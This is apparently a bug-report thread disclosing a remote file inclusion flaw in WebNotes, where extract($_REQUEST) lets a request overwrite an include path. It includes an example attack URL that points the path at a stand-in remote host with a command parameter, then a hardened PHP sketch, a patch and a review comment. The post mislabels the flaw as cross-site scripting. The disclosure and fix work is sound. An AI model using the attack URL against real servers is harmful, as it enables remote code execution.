don't use this software until it is fixed. our server got hacked that way.
the bug is in php_api.php line 77:
extract($REQUEST);
this allows changing $t_path_core, which is used in api.php:
require_once( $t_path_core . 'constants_inc.php' );
this can be used for a cross site scripting attack.
how does it work:
GET http://server/xxxxx/api.php?t_path_core=http://pathtohackingtool?&cmd=id
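The variable overwrite described in the post above, reduced to a stand-alone PHP sketch beside an allow-listed alternative. This is an added example, not part of the thread and not WebNotes code; the function names, the note_id key and the sample request are assumptions constructed for illustration.

```php
<?php
// Added illustration, not WebNotes code. Function and key names are hypothetical.

// Constructed request data: one ordinary field plus a key that collides with
// the internal include-path variable (placeholder value, never fetched).
$sample_request = array(
    'note_id'     => '42',
    't_path_core' => 'http://example.invalid/placeholder?',
);

// Pattern from the post: extract() defaults to EXTR_OVERWRITE, so a request
// key replaces a variable that already exists in the calling scope.
function path_after_plain_extract( array $p_request ) {
    $t_path_core = __DIR__ . DIRECTORY_SEPARATOR;
    extract( $p_request );
    return $t_path_core;
}

// Hardened: copy only allow-listed keys into a prefixed namespace, then build
// the include path from a fixed base and a fixed set of file names.
function path_after_safe_import( array $p_request, $p_file ) {
    $t_path_core = __DIR__ . DIRECTORY_SEPARATOR;
    $t_allowed   = array( 'note_id' );
    $t_input     = array_intersect_key( $p_request, array_flip( $t_allowed ) );
    extract( $t_input, EXTR_PREFIX_ALL, 'f' );   // creates $f_note_id only
    $t_files = array( 'constants_inc.php', 'config_defaults_inc.php' );
    if ( !in_array( $p_file, $t_files, true ) ) {
        throw new InvalidArgumentException( 'unexpected include name' );
    }
    return $t_path_core . $p_file;
}

$t_expected = __DIR__ . DIRECTORY_SEPARATOR;
// Plain extract(): the path now holds the request value, not the local directory.
var_dump( path_after_plain_extract( $sample_request ) === $t_expected );
// Allow-list plus prefix: the request cannot reach $t_path_core.
var_dump( path_after_safe_import( $sample_request, 'constants_inc.php' )
    === $t_expected . 'constants_inc.php' );
```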
The concrete bug is fairly easy to fix, but of course the right action would be not to use those globals at all.
--- webnotes/core/api.php 19 Aug 2005 14:52:46 -0000 1.1
+++ webnotes/core/api.php 24 Sep 2005 16:29:31 -0000
@@ -17,6 +17,9 @@
# The $g_ext can not be used before the custom config is included.
require_once( $t_path_core . 'php_api.php' );
+ # that might have done evil things to our globals - fix them
+ $t_path_main = dirname( dirname( __FILE__ ) ) . DIRECTORY_SEPARATOR;
+ $t_path_core = $t_path_main . 'core' . DIRECTORY_SEPARATOR;
require_once( $t_path_core . 'constants_inc.php' );
require_once( $t_path_core . 'config_defaults_inc.php' );
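Review bot: the reset restores only $t_path_main and $t_path_core, and only after php_api.php has been loaded, so any other global that include can modify stays modified for the rest of api.php. The require_once( $t_path_core . 'php_api.php' ) line just above the added lines still depends on whatever $t_path_core held at that point; consider deriving both paths from dirname( dirname( __FILE__ ) ) before that first require_once as well, or removing the overwrite inside php_api.php so no re-assignment is needed. The added comment would also read better if it named the php_api.php include explicitly instead of "that", so the reason for the re-assignment survives later edits.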